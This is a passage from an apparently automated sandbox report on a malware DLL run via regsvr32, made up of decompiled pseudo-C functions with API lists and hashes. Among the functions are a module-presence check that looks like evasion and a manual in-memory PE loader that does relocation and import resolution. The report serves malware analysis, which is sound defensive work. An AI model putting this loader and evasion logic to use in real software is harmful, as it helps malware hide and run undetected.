                                          						_t74 = _t272 + 0x6c; // 0xa1ec8b55
                                          						memcpy( *_t73 +  *_t74,  *((intOrPtr*)( *_t272)) - _t232, _t232);
                                          						_t225 = _a4;
                                          						_t273 = _t273 + 0xc;
                                          						_t76 = _t272 + 0x6c;
                                          						 *_t76 =  *(_t272 + 0x6c) + _t225;
                                          						__eflags =  *_t76;
                                          						_t78 = _t272 + 0x6c; // 0xa1ec8b55
                                          						_t184 =  *_t78;
                                          						_t79 = _t272 + 0x2c; // 0x8df075ff
                                          						_t239 =  *_t79;
                                          					} else {
                                          						 *(_t272 + 0x16b0) = 2;
                                          						_t61 = _t272 + 0x38; // 0xf47d8bff
                                          						memcpy( *_t61,  *_t142 - _t224, _t224);
                                          						_t62 = _t272 + 0x2c; // 0x8df075ff
                                          						_t184 =  *_t62;
                                          						_t273 = _t273 + 0xc;
                                          						_t225 = _a4;
                                          						_t239 = _t184;
                                          						 *(_t272 + 0x6c) = _t184;
                                          					}
                                          					_t254 = _t184;
                                          					 *(_t272 + 0x5c) = _t184;
                                          					_t81 = _t272 + 0x16b4; // 0xe9ffcb83
                                          					_t185 =  *_t81;
                                          					_t240 = _t239 - _t185;
                                          					_t241 =  <=  ? _t225 : _t240;
                                          					_t242 = ( <=  ? _t225 : _t240) + _t185;
                                          					 *((intOrPtr*)(_t272 + 0x16b4)) = ( <=  ? _t225 : _t240) + _t185;
                                          				}
                                          				if( *(_t272 + 0x16c0) < _t254) {
                                          					 *(_t272 + 0x16c0) = _t254;
                                          				}
                                          				if(_t269 == 0) {
                                          					_t218 = _a8;
                                          					__eflags = _t218;
                                          					if(_t218 == 0) {
                                          						L34:
                                          						_t89 = _t272 + 0x3c; // 0x830cc483
                                          						_t219 =  *_t272;
                                          						_t145 =  *_t89 - _t254 - 1;
                                          						_a4 =  *_t272;
                                          						_t234 = _t254;
                                          						_v16 = _t145;
                                          						_v8 = _t254;
                                          						__eflags =  *((intOrPtr*)(_t219 + 4)) - _t145;
                                          						if( *((intOrPtr*)(_t219 + 4)) > _t145) {
                                          							_v8 = _t254;
                                          							_t95 = _t272 + 0x5c; // 0x84e85000
                                          							_a4 = _t219;
                                          							_t234 = _t254;
                                          							_t97 = _t272 + 0x2c; // 0x8df075ff
                                          							__eflags =  *_t95 -  *_t97;
                                          							if( *_t95 >=  *_t97) {
                                          								_t98 = _t272 + 0x2c; // 0x8df075ff
                                          								_t167 =  *_t98;
                                          								_t259 = _t254 - _t167;
                                          								_t99 = _t272 + 0x38; // 0xf47d8bff
                                          								 *(_t272 + 0x5c) =  *(_t272 + 0x5c) - _t167;
                                          								 *(_t272 + 0x6c) = _t259;
                                          								memcpy( *_t99, _t167 +  *_t99, _t259);
                                          								_t103 = _t272 + 0x16b0; // 0xdf750008
                                          								_t170 =  *_t103;
                                          								_t273 = _t273 + 0xc;
                                          								__eflags = _t170 - 2;
                                          								if(_t170 < 2) {
                                          									_t172 = _t170 + 1;
                                          									__eflags = _t172;
                                          									 *(_t272 + 0x16b0) = _t172;
                                          								}
                                          								_t106 = _t272 + 0x2c; // 0x8df075ff
                                          								_t145 = _v16 +  *_t106;
                                          								__eflags = _t145;
                                          								_a4 =  *_t272;
                                          								_t108 = _t272 + 0x6c; // 0xa1ec8b55
                                          								_t234 =  *_t108;
                                          								_v8 = _t234;
                                          							}
                                          						}
                                          						_t255 = _a4;
                                          						_t220 =  *((intOrPtr*)(_a4 + 4));
                                          						__eflags = _t145 - _t220;
                                          						_t221 =  <=  ? _t145 : _t220;
                                          						_t146 = _t221;
                                          						_a4 = _t221;
                                          						_t222 = _a8;
                                          						__eflags = _t146;
                                          						if(_t146 != 0) {
                                          							_t114 = _t272 + 0x38; // 0xf47d8bff
                                          							E10014C30(_t255,  *_t114 + _v8, _t146);
                                          							_t273 = _t273 + 0xc;
                                          							_t117 = _t272 + 0x6c;
                                          							 *_t117 =  *(_t272 + 0x6c) + _a4;
                                          							__eflags =  *_t117;
                                          							_t119 = _t272 + 0x6c; // 0xa1ec8b55
                                          							_t234 =  *_t119;
                                          						}
                                          						__eflags =  *(_t272 + 0x16c0) - _t234;
                                          						if( *(_t272 + 0x16c0) < _t234) {
                                          							 *(_t272 + 0x16c0) = _t234;
                                          						}
                                          						_t122 = _t272 + 0x16bc; // 0x8b3c7e89
                                          						_t123 = _t272 + 0xc; // 0x452bf84d
                                          						_t257 =  *_t123 - ( *_t122 + 0x2a >> 3);
                                          						__eflags = _t257 - 0xffff;
                                          						_t258 =  >  ? 0xffff : _t257;
                                          						_t124 = _t272 + 0x2c; // 0x8df075ff
                                          						_t151 =  *_t124;
                                          						_t125 = _t272 + 0x5c; // 0x84e85000
                                          						_t235 = _t234 -  *_t125;
                                          						__eflags = _t258 - _t151;
                                          						_t152 =  <=  ? _t258 : _t151;
                                          						__eflags = _t235 - ( <=  ? _t258 : _t151);
                                          						if(_t235 >= ( <=  ? _t258 : _t151)) {
                                          							L49:
                                          							__eflags = _t235 - _t258;
                                          							_t154 =  >  ? _t258 : _t235;
                                          							_a4 =  >  ? _t258 : _t235;
                                          							__eflags = _t222 - 4;
                                          							if(_t222 != 4) {
                                          								L53:
                                          								_t269 = 0;
                                          								__eflags = 0;
                                          							} else {
                                          								_t161 =  *_t272;
                                          								__eflags =  *(_t161 + 4);
                                          								_t154 = _a4;
                                          								if( *(_t161 + 4) != 0) {
                                          									goto L53;
                                          								} else {
                                          									__eflags = _t154 - _t235;
                                          									if(_t154 != _t235) {
                                          										goto L53;
                                          									} else {
                                          										_t269 = _t222 - 3;
                                          									}
                                          								}
                                          							}
                                          							_t131 = _t272 + 0x38; // 0xf47d8bff
                                          							_t132 = _t272 + 0x5c; // 0x84e85000
                                          							E10015D90(_t272, _t272,  *_t131 +  *_t132, _t154, _t269);
                                          							_t134 = _t272 + 0x5c;
                                          							 *_t134 =  *(_t272 + 0x5c) + _a4;
                                          							__eflags =  *_t134;
                                          							E10014AF0( *_t134,  *_t272);
                                          						} else {
                                          							__eflags = _t235;
                                          							if(_t235 != 0) {
                                          								L46:
                                          								__eflags = _t222;
                                          								if(_t222 != 0) {
                                          									_t162 =  *_t272;
                                          									__eflags =  *(_t162 + 4);
                                          									if( *(_t162 + 4) == 0) {
                                          										__eflags = _t235 - _t258;
                                          										if(_t235 <= _t258) {
                                          											goto L49;
                                          										}
                                          									}
                                          								}
                                          							} else {
                                          								__eflags = _t222 - 4;
                                          								if(_t222 == 4) {
                                          									goto L46;
                                          								}
                                          							}
                                          						}
                                          						asm("sbb edi, edi");
                                          						_t271 =  ~_t269 & 0x00000002;
                                          						__eflags = _t271;
                                          						return _t271;
                                          					} else {
                                          						__eflags = _t218 - 4;
                                          						if(_t218 == 4) {
                                          							goto L34;
                                          						} else {
                                          							_t173 =  *_t272;
                                          							__eflags =  *(_t173 + 4);
                                          							if( *(_t173 + 4) != 0) {
                                          								goto L34;
                                          							} else {
                                          								_t88 = _t272 + 0x5c; // 0x84e85000
                                          								__eflags = _t254 -  *_t88;
                                          								if(_t254 !=  *_t88) {
                                          									goto L34;
                                          								} else {
                                          									return 1;
                                          								}
                                          							}
                                          						}
                                          					}
                                          				} else {
                                          					return 3;
                                          				}
                                          			}

                                          APIs
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.637039550.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                                          • Associated: 0000000D.00000002.637019650.0000000010000000.00000002.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_13_2_10000000_regsvr32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: memcpy
                                          • String ID:
                                          • API String ID: 3510742995-0
                                          • Opcode ID: 7f7d741cb3f994d18600c39c46d11212efede5dc36165527de22fb167ca1c3df
                                          • Instruction ID: 4fdc6b10e7b7168a0789f31eb0048a9ad86d4efd395f939b62a688ab4a7349d5
                                          • Opcode Fuzzy Hash: 7f7d741cb3f994d18600c39c46d11212efede5dc36165527de22fb167ca1c3df
                                          • Instruction Fuzzy Hash: FAD112B5600A009FCB24CF69D8D4A6AB7F1FF88344B25892DE88ACB711D771E9958B50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 70%
                                          			E10004D6D(intOrPtr* __ecx, void* __edx, void* __fp0) {
                                          				char _v516;
                                          				char _v556;
                                          				char _v564;
                                          				char _v568;
                                          				char _v572;
                                          				char _v576;
                                          				intOrPtr _v580;
                                          				char _v588;
                                          				signed int _v596;
                                          				intOrPtr _v602;
                                          				intOrPtr _v604;
                                          				char _v608;
                                          				CHAR* _v612;
                                          				CHAR* _v616;
                                          				signed int _v620;
                                          				signed int _v624;
                                          				signed int _v628;
                                          				signed int _v632;
                                          				char _v636;
                                          				intOrPtr _t119;
                                          				signed int _t122;
                                          				CHAR* _t124;
                                          				intOrPtr _t125;
                                          				CHAR* _t127;
                                          				WCHAR* _t130;
                                          				intOrPtr _t133;
                                          				intOrPtr _t137;
                                          				WCHAR* _t138;
                                          				intOrPtr _t142;
                                          				WCHAR* _t143;
                                          				CHAR* _t144;
                                          				intOrPtr _t145;
                                          				intOrPtr _t150;
                                          				intOrPtr _t153;
                                          				WCHAR* _t154;
                                          				signed int _t159;
                                          				WCHAR* _t160;
                                          				intOrPtr _t163;
                                          				intOrPtr _t165;
                                          				intOrPtr _t166;
                                          				intOrPtr _t170;
                                          				signed int _t173;
                                          				signed int _t178;
                                          				intOrPtr _t182;
                                          				WCHAR* _t184;
                                          				char _t186;
                                          				WCHAR* _t188;
                                          				intOrPtr _t200;
                                          				intOrPtr _t211;
                                          				signed int _t215;
                                          				char _t220;
                                          				WCHAR* _t231;
                                          				intOrPtr _t235;
                                          				intOrPtr _t238;
                                          				intOrPtr _t239;
                                          				intOrPtr _t246;
                                          				signed int _t248;
                                          				WCHAR* _t249;
                                          				CHAR* _t250;
                                          				intOrPtr _t262;
                                          				void* _t271;
                                          				intOrPtr _t272;
                                          				signed int _t277;
                                          				void* _t278;
                                          				intOrPtr _t280;
                                          				signed int _t282;
                                          				void* _t298;
                                          				void* _t299;
                                          				intOrPtr _t305;
                                          				CHAR* _t326;
                                          				void* _t328;
                                          				WCHAR* _t329;
                                          				intOrPtr _t331;
                                          				WCHAR* _t333;
                                          				signed int _t335;
                                          				intOrPtr* _t337;
                                          				void* _t338;
                                          				void* _t339;
                                          				void* _t353;
                                          
                                          				_t353 = __fp0;
                                          				_t337 = (_t335 & 0xfffffff8) - 0x26c;
                                          				_t119 =  *0x1001e688; // 0x1820590
                                          				_v620 = _v620 & 0x00000000;
                                          				_t328 = __ecx;
                                          				if(( *(_t119 + 0x1898) & 0x00000082) == 0) {
                                          					L7:
                                          					_t14 = E1000B7A8(0x1001b9c8,  &_v516) + 1; // 0x1
                                          					E1000A86D( &_v556, _t14, _t351);
                                          					_t298 = 0x64;
                                          					_t122 = E1000A471( &_v556, _t298);
                                          					 *0x1001e748 = _t122;
                                          					if(_t122 != 0) {
                                          						_push(0x4e5);
                                          						_t299 = 0x10;
                                          						 *0x1001e680 = E1000E1BC(0x1001b9cc, _t299);
                                          						 *_t337 = 0x610;
                                          						_t124 = E100095E1(0x1001b9cc);
                                          						_push(0);
                                          						_push(_t124);
                                          						_v612 = _t124;
                                          						_t125 =  *0x1001e688; // 0x1820590
                                          						_t127 = E100092E5(_t125 + 0x228);
                                          						_t338 = _t337 + 0xc;
                                          						_v616 = _t127;
                                          						E100085D5( &_v612);
                                          						_t130 = E1000B269(_t127);
                                          						_t246 = 3;
                                          						__eflags = _t130;
                                          						if(_t130 != 0) {
                                          							 *((intOrPtr*)(_t328 + 0x10)) = _t239;
                                          							 *_t328 = _t246;
                                          						}
                                          						E1000861A( &_v616, 0xfffffffe);
                                          						_t133 =  *0x1001e688; // 0x1820590
                                          						_t22 = _t133 + 0x114; // 0x18206a4
                                          						E10004A0B( *((intOrPtr*)( *((intOrPtr*)(_t133 + 0x110)))), _t22, _t353, _t328, 0, 0);
                                          						_t262 =  *0x1001e688; // 0x1820590
                                          						_t339 = _t338 + 0x14;
                                          						__eflags =  *((intOrPtr*)(_t262 + 0x101c)) - _t246;
                                          						if( *((intOrPtr*)(_t262 + 0x101c)) == _t246) {
                                          							L17:
                                          							asm("stosd");
                                          							asm("stosd");
                                          							asm("stosd");
                                          							asm("stosd");
                                          							asm("stosd");
                                          							_v572 = _t328;
                                          							_v576 =  *((intOrPtr*)(_t262 + 0x214));
                                          							_t137 =  *0x1001e680; // 0x0
                                          							_t138 =  *(_t137 + 8);
                                          							__eflags = _t138;
                                          							if(_t138 != 0) {
                                          								 *_t138(0, 0, 1,  &_v568,  &_v564);
                                          							}
                                          							_v620 = _v620 & 0x00000000;
                                          							E1000E2C6(_t353,  &_v576);
                                          							_pop(_t262);
                                          							_t142 =  *0x1001e6b4; // 0x189fc48
                                          							_t143 =  *((intOrPtr*)(_t142 + 0x10))(0, 0,  &_v620);
                                          							__eflags = _t143;
                                          							if(_t143 == 0) {
                                          								E1000E2C6(_t353,  &_v588);
                                          								_t235 =  *0x1001e6b4; // 0x189fc48
                                          								_pop(_t262);
                                          								 *((intOrPtr*)(_t235 + 0xc))(_v632);
                                          							}
                                          							__eflags =  *0x1001e73c;
                                          							if( *0x1001e73c <= 0) {
                                          								goto L36;
                                          							} else {
                                          								_t165 =  *0x1001e680; // 0x0
                                          								__eflags =  *(_t165 + 8);
                                          								if( *(_t165 + 8) != 0) {
                                          									_t231 =  *(_t165 + 0xc);
                                          									__eflags = _t231;
                                          									if(_t231 != 0) {
                                          										 *_t231(_v580);
                                          									}
                                          								}
                                          								_t166 =  *0x1001e688; // 0x1820590
                                          								_t262 =  *((intOrPtr*)(_t166 + 0x214));
                                          								__eflags = _t262 - _t246;
                                          								if(_t262 == _t246) {
                                          									goto L36;
                                          								} else {
                                          									__eflags =  *((intOrPtr*)(_t166 + 4)) - 6;
                                          									if( *((intOrPtr*)(_t166 + 4)) >= 6) {
                                          										__eflags =  *((intOrPtr*)(_t166 + 0x101c)) - _t246;
                                          										if( *((intOrPtr*)(_t166 + 0x101c)) == _t246) {
                                          											E100049A5();
                                          											asm("stosd");
                                          											asm("stosd");
                                          											asm("stosd");
                                          											asm("stosd");
                                          											_t170 =  *0x1001e684; // 0x189faa0
                                          											 *((intOrPtr*)(_t170 + 0xd8))( &_v608);
                                          											_t262 = _v602;
                                          											_t248 = 0x3c;
                                          											_t173 = _t262 + 0x00000002 & 0x0000ffff;
                                          											_v596 = _t173;
                                          											_v620 = _t173 / _t248 + _v604 & 0x0000ffff;
                                          											_t178 = _t262 + 0x0000000e & 0x0000ffff;
                                          											_v624 = _t178;
                                          											_v628 = _t178 / _t248 + _v604 & 0x0000ffff;
                                          											_t182 =  *0x1001e688; // 0x1820590
                                          											_t184 = E1000FC1F(_t182 + 0x228, _t178 % _t248, _t353, 0, _t182 + 0x228, 0);
                                          											_t339 = _t339 + 0xc;
                                          											__eflags = _t184;
                                          											if(_t184 >= 0) {
                                          												_t333 = E10008604(0x1000);
                                          												_v616 = _t333;
                                          												_pop(_t262);
                                          												__eflags = _t333;
                                          												if(_t333 != 0) {
                                          													_t186 = E1000109A(_t262, 0x148);
                                          													_t305 =  *0x1001e688; // 0x1820590
                                          													_v636 = _t186;
                                          													_push(_t305 + 0x648);
                                          													_push(0xa);
                                          													_push(7);
                                          													_t271 = 2;
                                          													E1000902D(_t271,  &_v572);
                                          													_t272 =  *0x1001e688; // 0x1820590
                                          													_t188 = E100060DF( &_v572, _t272 + 0x228, 1,  *((intOrPtr*)(_t272 + 0xa0)));
                                          													_t339 = _t339 + 0x18;
                                          													_v632 = _t188;
                                          													__eflags = _t188;
                                          													if(_t188 != 0) {
                                          														_push(_v624 % _t248 & 0x0000ffff);
                                          														_push(_v628 & 0x0000ffff);
                                          														_push(_v596 % _t248 & 0x0000ffff);
                                          														_push(_v620 & 0x0000ffff);
                                          														_push(_v632);
                                          														_push( &_v572);
                                          														_t200 =  *0x1001e688; // 0x1820590
                                          														__eflags = _t200 + 0x1020;
                                          														E10009640(_t333, 0x1000, _v636, _t200 + 0x1020);
                                          														E100085D5( &_v636);
                                          														E1000A911(_t333, 0, 0xbb8, 1);
                                          														E1000861A( &_v632, 0xfffffffe);
                                          														_t339 = _t339 + 0x44;
                                          													}
                                          													E1000861A( &_v616, 0xfffffffe);
                                          													_pop(_t262);
                                          												}
                                          											}
                                          										}
                                          										goto L36;
                                          									}
                                          									__eflags = _t262 - 2;
                                          									if(_t262 != 2) {
                                          										goto L36;
                                          									}
                                          									E100049A5();
                                          									asm("stosd");
                                          									asm("stosd");
                                          									asm("stosd");
                                          									asm("stosd");
                                          									_t211 =  *0x1001e684; // 0x189faa0
                                          									 *((intOrPtr*)(_t211 + 0xd8))( &_v608);
                                          									_t215 = _v602 + 0x00000002 & 0x0000ffff;
                                          									_v628 = _t215;
                                          									_t277 = 0x3c;
                                          									_v632 = _t215 / _t277 + _v604 & 0x0000ffff;
                                          									_t249 = E10008604(0x1000);
                                          									_v624 = _t249;
                                          									_pop(_t278);
                                          									__eflags = _t249;
                                          									if(_t249 != 0) {
                                          										_t220 = E100095E1(_t278, 0x32d);
                                          										_t280 =  *0x1001e688; // 0x1820590
                                          										_push(_t280 + 0x228);
                                          										_t282 = 0x3c;
                                          										_v636 = _t220;
                                          										_push(_v628 % _t282 & 0x0000ffff);
                                          										E10009640(_t249, 0x1000, _t220, _v632 & 0x0000ffff);
                                          										E100085D5( &_v636);
                                          										E1000A911(_t249, 0, 0xbb8, 1);
                                          										E1000861A( &_v624, 0xfffffffe);
                                          									}
                                          									goto L41;
                                          								}
                                          							}
                                          						} else {
                                          							_t238 =  *((intOrPtr*)(_t262 + 0x214));
                                          							__eflags = _t238 - _t246;
                                          							if(_t238 == _t246) {
                                          								goto L17;
                                          							}
                                          							__eflags =  *((intOrPtr*)(_t262 + 4)) - 6;
                                          							if( *((intOrPtr*)(_t262 + 4)) >= 6) {
                                          								L36:
                                          								_t144 = E100095E1(_t262, 0x610);
                                          								_push(0);
                                          								_push(_t144);
                                          								_v616 = _t144;
                                          								_t145 =  *0x1001e688; // 0x1820590
                                          								_t329 = E100092E5(_t145 + 0x228);
                                          								_v612 = _t329;
                                          								__eflags = _t329;
                                          								if(_t329 != 0) {
                                          									_t160 = E1000B269(_t329);
                                          									__eflags = _t160;
                                          									if(_t160 != 0) {
                                          										_t163 =  *0x1001e684; // 0x189faa0
                                          										 *((intOrPtr*)(_t163 + 0x10c))(_t329);
                                          									}
                                          									E1000861A( &_v612, 0xfffffffe);
                                          								}
                                          								E100085D5( &_v616);
                                          								_t150 =  *0x1001e688; // 0x1820590
                                          								lstrcpynW(_t150 + 0x438,  *0x1001e740, 0x105);
                                          								_t153 =  *0x1001e688; // 0x1820590
                                          								_t154 = _t153 + 0x228;
                                          								__eflags = _t154;
                                          								lstrcpynW(_t154,  *0x1001e738, 0x105);
                                          								_t331 =  *0x1001e688; // 0x1820590
                                          								_t117 = _t331 + 0x228; // 0x18207b8
                                          								 *((intOrPtr*)(_t331 + 0x434)) = E10008FBE(_t117, __eflags);
                                          								E1000861A(0x1001e740, 0xfffffffe);
                                          								E1000861A(0x1001e738, 0xfffffffe);
                                          								L41:
                                          								_t159 = 0;
                                          								__eflags = 0;
                                          								L42:
                                          								return _t159;
                                          							}
                                          							__eflags = _t238 - 2;
                                          							if(_t238 != 2) {
                                          								goto L36;
                                          							}
                                          							goto L17;
                                          						}
                                          					}
                                          					L8:
                                          					_t159 = _t122 | 0xffffffff;
                                          					goto L42;
                                          				}
                                          				_t250 = E100095C7(0x6e2);
                                          				_v616 = _t250;
                                          				_t326 = E100095C7(0x9f5);
                                          				_v612 = _t326;
                                          				if(_t250 != 0 && _t326 != 0) {
                                          					if(GetModuleHandleA(_t250) != 0 || GetModuleHandleA(_t326) != 0) {
                                          						_v620 = 1;
                                          					}
                                          					E100085C2( &_v616);
                                          					_t122 = E100085C2( &_v612);
                                          					_t351 = _v620;
                                          					if(_v620 != 0) {
                                          						goto L8;
                                          					}
                                          				}
                                          			}

                                          0x10004d9b
                                          0x10004da2
                                          0x10004dab
                                          0x10004dad
                                          0x10004db3
                                          0x10004dc4
                                          0x10004dcd
                                          0x10004dcd
                                          0x10004dd9
                                          0x10004de2
                                          0x10004de7
                                          0x10004dec
                                          0x00000000
                                          0x00000000
                                          0x10004dec

                                          APIs
                                          • GetModuleHandleA.KERNEL32(00000000,00000000), ref: 10004DC0
                                          • GetModuleHandleA.KERNEL32(00000000), ref: 10004DC7
                                          • lstrcpynW.KERNEL32(01820158,00000105), ref: 1000526F
                                          • lstrcpynW.KERNEL32(01820368,00000105), ref: 10005283
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.637039550.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                                          • Associated: 0000000D.00000002.637019650.0000000010000000.00000002.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_13_2_10000000_regsvr32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: HandleModulelstrcpyn
                                          • String ID:
                                          • API String ID: 3430401031-0
                                          • Opcode ID: dea4718fcff11b40ad77ac1c7875c25be4704c52ca9a87ecd19dbb36a7e3fe5b
                                          • Instruction ID: cc48400d40a66e7674bcd18edc35038107661711004b249490cc292a5082b98a
                                          • Opcode Fuzzy Hash: dea4718fcff11b40ad77ac1c7875c25be4704c52ca9a87ecd19dbb36a7e3fe5b
                                          • Instruction Fuzzy Hash: A7E1CC71608341AFF340CF64CC86F6A73E9EB88390F454A29F584DB2D5EB75EA448B52
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 52%
                                          			E10012AEC(intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12) {
                                          				signed int _v5;
                                          				signed short _v12;
                                          				intOrPtr* _v16;
                                          				signed int* _v20;
                                          				intOrPtr _v24;
                                          				unsigned int _v28;
                                          				signed short* _v32;
                                          				struct HINSTANCE__* _v36;
                                          				intOrPtr* _v40;
                                          				signed short* _v44;
                                          				intOrPtr _v48;
                                          				unsigned int _v52;
                                          				intOrPtr _v56;
                                          				_Unknown_base(*)()* _v60;
                                          				signed int _v64;
                                          				intOrPtr _v68;
                                          				intOrPtr _v72;
                                          				unsigned int _v76;
                                          				intOrPtr _v80;
                                          				signed int _v84;
                                          				intOrPtr _v88;
                                          				signed int _t149;
                                          				void* _t189;
                                          				signed int _t194;
                                          				signed int _t196;
                                          				intOrPtr _t236;
                                          
                                          				_v72 =  *((intOrPtr*)(_a4 + 0x3c)) + _a4;
                                          				_v24 = _v72;
                                          				_t236 = _a4 -  *((intOrPtr*)(_v24 + 0x34));
                                          				_v56 = _t236;
                                          				if(_t236 == 0) {
                                          					L13:
                                          					while(0 != 0) {
                                          					}
                                          					_push(8);
                                          					if( *((intOrPtr*)(_v24 + 0xbadc25)) == 0) {
                                          						L35:
                                          						_v68 =  *((intOrPtr*)(_v24 + 0x28)) + _a4;
                                          						while(0 != 0) {
                                          						}
                                          						if(_a12 != 0) {
                                          							 *_a12 = _v68;
                                          						}
                                          						 *((intOrPtr*)(_v24 + 0x34)) = _a4;
                                          						return _v68(_a4, 1, _a8);
                                          					}
                                          					_v84 = 0x80000000;
                                          					_t149 = 8;
                                          					_v16 = _a4 +  *((intOrPtr*)(_v24 + (_t149 << 0) + 0x78));
                                          					while( *((intOrPtr*)(_v16 + 0xc)) != 0) {
                                          						_v36 = GetModuleHandleA( *((intOrPtr*)(_v16 + 0xc)) + _a4);
                                          						if(_v36 == 0) {
                                          							_v36 = LoadLibraryA( *((intOrPtr*)(_v16 + 0xc)) + _a4);
                                          						}
                                          						if(_v36 != 0) {
                                          							if( *_v16 == 0) {
                                          								_v20 =  *((intOrPtr*)(_v16 + 0x10)) + _a4;
                                          							} else {
                                          								_v20 =  *_v16 + _a4;
                                          							}
                                          							_v64 = _v64 & 0x00000000;
                                          							while( *_v20 != 0) {
                                          								if(( *_v20 & _v84) == 0) {
                                          									_v88 =  *_v20 + _a4;
                                          									_v60 = GetProcAddress(_v36, _v88 + 2);
                                          								} else {
                                          									_v60 = GetProcAddress(_v36,  *_v20 & 0x0000ffff);
                                          								}
                                          								if( *((intOrPtr*)(_v16 + 0x10)) == 0) {
                                          									 *_v20 = _v60;
                                          								} else {
                                          									 *( *((intOrPtr*)(_v16 + 0x10)) + _a4 + _v64) = _v60;
                                          								}
                                          								_v20 =  &(_v20[1]);
                                          								_v64 = _v64 + 4;
                                          							}
                                          							_v16 = _v16 + 0x14;
                                          							continue;
                                          						} else {
                                          							_t189 = 0xfffffffd;
                                          							return _t189;
                                          						}
                                          					}
                                          					goto L35;
                                          				}
                                          				_t194 = 8;
                                          				_v44 = _a4 +  *((intOrPtr*)(_v24 + 0x78 + _t194 * 5));
                                          				_t196 = 8;
                                          				_v48 =  *((intOrPtr*)(_v24 + 0x7c + _t196 * 5));
                                          				while(0 != 0) {
                                          				}
                                          				while(_v48 > 0) {
                                          					_v28 = _v44[2];
                                          					_v48 = _v48 - _v28;
                                          					_v28 = _v28 - 8;
                                          					_v28 = _v28 >> 1;
                                          					_v32 =  &(_v44[4]);
                                          					_v80 = _a4 +  *_v44;
                                          					_v52 = _v28;
                                          					while(1) {
                                          						_v76 = _v52;
                                          						_v52 = _v52 - 1;
                                          						if(_v76 == 0) {
                                          							break;
                                          						}
                                          						_v5 = ( *_v32 & 0x0000ffff) >> 0xc;
                                          						_v12 =  *_v32 & 0xfff;
                                          						_v40 = (_v12 & 0x0000ffff) + _v80;
                                          						if((_v5 & 0x000000ff) != 3) {
                                          							if((_v5 & 0x000000ff) == 0xa) {
                                          								 *_v40 =  *_v40 + _v56;
                                          							}
                                          						} else {
                                          							 *_v40 =  *_v40 + _v56;
                                          						}
                                          						_v32 =  &(_v32[1]);
                                          					}
                                          					_v44 = _v32;
                                          				}
                                          				goto L13;
                                          			}

                                          APIs
                                          • GetModuleHandleA.KERNEL32(?), ref: 10012C4C
                                          • LoadLibraryA.KERNEL32(?), ref: 10012C65
                                          • GetProcAddress.KERNEL32(00000000,890CC483), ref: 10012CC1
                                          • GetProcAddress.KERNEL32(00000000,?), ref: 10012CE0
                                          Memory Dump Source
                                          • Source File: 0000000D.00000002.637039550.0000000010001000.00000040.00020000.sdmp, Offset: 10000000, based on PE: true
                                          • Associated: 0000000D.00000002.637019650.0000000010000000.00000002.00020000.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_13_2_10000000_regsvr32.jbxd
                                          Yara matches
                                          Similarity
                                          • API ID: AddressProc$HandleLibraryLoadModule
                                          • String ID:
                                          • API String ID: 384173800-0
                                          • Opcode ID: 5436229f79adfd2309291a4696e3cc16a3b33e027d57b62ece0ec2bba77662a7
                                          • Instruction ID: 2edd54a6eb651874f6cc264e5dd0ce055865838d2197d7e71e48a8f46057b6f1
                                          • Opcode Fuzzy Hash: 5436229f79adfd2309291a4696e3cc16a3b33e027d57b62ece0ec2bba77662a7
                                          • Instruction Fuzzy Hash: 62A168B5E00219DFCB40CFA8D881AADBBF1FF08354F108469E915AB351D734EA91CB64
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 75%
                                          			E10001C68(signed int __ecx, void* __eflags, void* __fp0) {
                                          				char _v16;
                                          				intOrPtr _v20;
                                          				char _v24;
                                          				char _v28;
                                          				void* _t13;
                                          				intOrPtr _t15;
                                          				signed int _t16;
                                          				intOrPtr _t17;
                                          				signed int _t18;
                                          				char _t20;
                                          				intOrPtr _t22;
                                          				void* _t23;
                                          				void* _t24;
                                          				intOrPtr _t29;
                                          				intOrPtr _t35;
                                          				intOrPtr _t41;
                                          				intOrPtr _t43;
                                          				intOrPtr _t48;
                                          				void* _t51;
                                          				signed int _t61;
                                          				signed int _t64;
                                          				void* _t71;
                                          
                                          				_t71 = __fp0;
                                          				_t61 = __ecx;
                                          				_t41 =  *0x1001e6dc; // 0x0
                                          				_t13 = E1000A4BF(_t41, 0);
                                          				while(_t13 < 0) {
                                          					E1000980C( &_v28);
                                          					_t43 =  *0x1001e6e0; // 0x0
                                          					_t15 =  *0x1001e6e4; // 0x0
                                          					_t41 = _t43 + 0xe10;
                                          					asm("adc eax, ebx");
                                          					__eflags = _t15 - _v24;
                                          					if(__eflags > 0) {
                                          						L9:
                                          						_t16 = 0xfffffffe;
                                          						L13:
                                          						return _t16;
                                          					}
                                          					if(__eflags < 0) {
                                          						L4:
                                          						_t17 =  *0x1001e684; // 0x189faa0
                                          						_t18 =  *((intOrPtr*)(_t17 + 0xc8))( *0x1001e6d0, 0);
                                          						__eflags = _t18;
                                          						if(_t18 == 0) {
                                          							break;
                                          						}
                                          						_t35 =  *0x1001e684; // 0x189faa0
                                          						 *((intOrPtr*)(_t35 + 0xb4))(0x3e8);
                                          						_t41 =  *0x1001e6dc; // 0x0
                                          						__eflags = 0;
                                          						_t13 = E1000A4BF(_t41, 0);
                                          						continue;
                                          					}
                                          					__eflags = _t41 - _v28;
                                          					if(_t41 >= _v28) {
                                          						goto L9;
                                          					}
                                          					goto L4;
                                          				}
                                          				asm("stosd");
                                          				asm("stosd");
                                          				asm("stosd");
                                          				asm("stosd");
                                          				_t20 =  *0x1001e6e8; // 0x0
                                          				_v28 = _t20;
                                          				_t22 = E1000A6A9(_t41, _t61,  &_v16);
                                          				_v20 = _t22;
                                          				if(_t22 != 0) {
                                          					_t23 = GetCurrentProcess();
                                          					_t24 = GetCurrentThread();
                                          					DuplicateHandle(GetCurrentProcess(), _t24, _t23, 0x1001e6d0, 0, 0, 2);
                                          					E1000980C(0x1001e6e0);
                                          					_t64 = E10001A1B( &_v28, E10001226, _t71);
                                          					__eflags = _t64;
